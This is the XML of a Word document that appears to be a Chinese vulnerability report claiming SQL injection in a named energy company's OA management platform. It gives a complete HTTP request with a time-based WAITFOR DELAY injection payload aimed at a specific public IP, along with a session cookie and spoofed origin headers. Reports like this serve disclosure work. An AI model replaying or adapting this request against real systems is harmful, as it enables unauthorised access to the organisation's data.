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C94C4" w14:textId="74ED9D3B" w:rsidR="00CD16F4" w:rsidRPr="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD16F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>中国庆华能源集团有限公司</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD16F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD16F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>庆华能源</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD16F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>OA系统管理平台</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD16F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>存在SQL注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3E2DBE" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4"/>
    <w:p w14:paraId="5DBB185C" w14:textId="4663D063" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资产证明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8AF03E" w14:textId="3479F37E" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="457EFE31" wp14:editId="4A20F91A">
            <wp:extent cx="5274310" cy="2127250"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="121425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7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3FF" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4"/>
    <w:p w14:paraId="41229077" w14:textId="32E76BF6" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B51AAD6" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4"/>
    <w:p w14:paraId="56E58A02" w14:textId="660CFCF8" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4">
      <w:r>
        <w:t>GET /c6/JHSoft.Web.Users/UserList.aspx/?nodeid=1007%27%3BWAITFOR+DELAY+%270%3A0%3A3%27-- HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEC4BDD" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4">
      <w:r>
        <w:t>Host: 117.78.6.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A272EA9" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4">
      <w:r>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C35C6EA" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4">
      <w:r>
        <w:t>Accept: text/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>html,application</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561CB75A" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4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=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B2E850" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4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38871F21" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4">
      <w:r>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C1F534" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4">
      <w:r>
        <w:t xml:space="preserve">Cookie: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ASP.NET_SessionId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=gccdsw1xsinrldk1v4j5gm1f; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>myie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E898EA" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4">
      <w:r>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573F3EB8" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4">
      <w:r>
        <w:t>X-Forwarded-For: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30560065" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4">
      <w:r>
        <w:t>X-Originating-IP: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E59FD94" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4">
      <w:r>
        <w:t>X-Remote-IP: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D61FD45" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4" w:rsidP="00CD16F4">
      <w:r>
        <w:t>X-Remote-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EE1FFF" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4"/>
    <w:p w14:paraId="01B8BB2F" w14:textId="77777777" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4"/>
    <w:p w14:paraId="1F70D959" w14:textId="165B3A16" w:rsidR="00CD16F4" w:rsidRDefault="00CD16F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>延时注入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B604A7" w14:textId="732586FE" w:rsidR="0099459C" w:rsidRDefault="00CD16F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6772D6CE" wp14:editId="0CA54069">
            <wp:extent cx="5274310" cy="3171825"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="32831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F4"/>
    <w:rsid w:val="0099459C"/>
    <w:rsid w:val="00C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3E29"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{83F04F35-612D-42D9-9846-E99030DD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xie</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>sc xie</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-29T08:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-29T08:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>